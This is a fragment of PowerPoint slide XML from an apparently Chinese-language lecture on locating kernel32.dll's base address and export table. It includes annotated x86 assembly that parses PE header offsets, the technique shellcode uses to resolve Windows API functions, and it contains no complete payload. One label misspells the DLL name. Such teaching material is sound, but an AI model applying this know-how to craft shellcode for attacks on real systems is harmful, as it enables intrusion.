          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5691008" y="2334970"/>
              <a:ext cx="266949" cy="3550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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="88" name="直线箭头连接符 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72885CEF-98EC-1C45-30F0-04FCF3D7E9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426389" y="2787449"/>
            <a:ext cx="0" cy="933178"/>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0" name="组合 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA446D0-D710-0748-09B3-FC33F682D123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6910344" y="2573758"/>
            <a:ext cx="2489260" cy="355012"/>
            <a:chOff x="8752313" y="2579579"/>
            <a:chExt cx="2489260" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823EBA7E-125F-F204-4076-56A378D44B71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10134882" y="2579579"/>
              <a:ext cx="26695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2" name="矩形 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F24A46-257B-23ED-06E6-84D54DAF43FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8752313" y="2579579"/>
              <a:ext cx="806505" cy="3550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导出表</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="矩形 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D17B3A-DF3C-7B7A-1F0F-59267647F978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9562097" y="2579579"/>
              <a:ext cx="572785" cy="35501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0x1C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9" name="矩形 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD1AE8E-32F4-A5FD-14FB-F292AF1088F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10401835" y="2579579"/>
              <a:ext cx="572785"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0x20</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90" name="矩形 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045C9156-D66E-344E-4D5A-06F66CB5CC49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10974620" y="2579579"/>
              <a:ext cx="26695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92" name="矩形 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28944DE-85A8-62E2-5480-6EA4BC73BC7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9132650" y="3720627"/>
            <a:ext cx="1970039" cy="61590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函数名称列表</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（字符串）</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23" name="组合 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888AEDF4-3897-E23A-8875-21995B408E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1880153" y="2573759"/>
            <a:ext cx="2718210" cy="356892"/>
            <a:chOff x="3245972" y="2575257"/>
            <a:chExt cx="2718210" cy="356892"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="122" name="组合 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E3E52F-EA1C-5057-69C3-9EA11F98CD96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5107453" y="2575258"/>
              <a:ext cx="856729" cy="356891"/>
              <a:chOff x="3129918" y="2334540"/>
              <a:chExt cx="856729" cy="356891"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="62" name="矩形 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84B4ECB1-C662-C2A8-0D93-A5D5E0AEBE08}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3705148" y="2334540"/>
                <a:ext cx="281499"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5" name="矩形 64">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265FB902-4543-F1B6-CF78-19D979CA4724}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3129918" y="2334540"/>
                <a:ext cx="575229" cy="3568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0x3C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94" name="矩形 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70956401-5A78-46DB-DEE1-90F2DF7268A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3245972" y="2575257"/>
              <a:ext cx="1860621" cy="35689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kennel32.dll</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基地址</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102" name="肘形连接符 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37D19FD-37A9-9D58-C768-B239A6345599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="94" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2810465" y="1957851"/>
            <a:ext cx="8304995" cy="615907"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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3D767799-F189-EDCC-84FD-59EF638A45A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102695" y="1586758"/>
            <a:ext cx="0" cy="366073"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0048AA"/>
            </a:solidFill>
            <a:headEnd type="ova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DF09E9EE-E5EB-BE35-BE60-112AB56B8A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900793" y="1425820"/>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第一步：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="116" name="直线箭头连接符 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC58F85-B438-5B7F-0BCC-BB85E333C4D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3987439" y="1607715"/>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737BF94A-6BA1-DBEE-7E92-CE99F2F1FA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5711107" y="1607714"/>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D4955767-22ED-8BE8-5BAE-CEA36283034F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7424588" y="1607713"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AC4664-4F20-A96E-06C8-81F6A407BFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8832945" y="1612908"/>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3F73A439-5333-505E-155F-4A680A88E7A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="897298" y="2575846"/>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第二步：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="126" name="直线箭头连接符 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031C0590-4B32-704A-1326-5A032E2FC0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="68" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4435366" y="2752429"/>
            <a:ext cx="595533" cy="0"/>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961300DE-AD74-4AA5-FEEC-45520CB46521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314811" y="2743562"/>
            <a:ext cx="595533" cy="0"/>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23E7712A-CA06-9221-99A3-9A164E6E1263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9266127" y="2787449"/>
            <a:ext cx="0" cy="933178"/>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160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二</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定位</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的导出表</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5131449" cy="5256212"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="5131449" cy="5256212"/>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643587" y="1719590"/>
              <a:ext cx="5111750" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>mov </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ebp,eax</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8000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>//</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>将</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>kernel32.dll</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>基地址赋值给</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>mov </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>eax</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>,[ebp+0x3C] </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>//</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>dll</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>PE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>头的指针（相对地址） </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>mov </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ecx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>,[ebp+eax+0x78] </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>//</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>导出表的指针（相对地址）</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ecx,ebp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>// </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>得到导出表的内存地址</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>mov </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ebx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>,[ecx+0x20] </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>//</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>导出函数名列表指针</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ebx,ebp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>//</a:t>
              </a:r>
              <a:r>
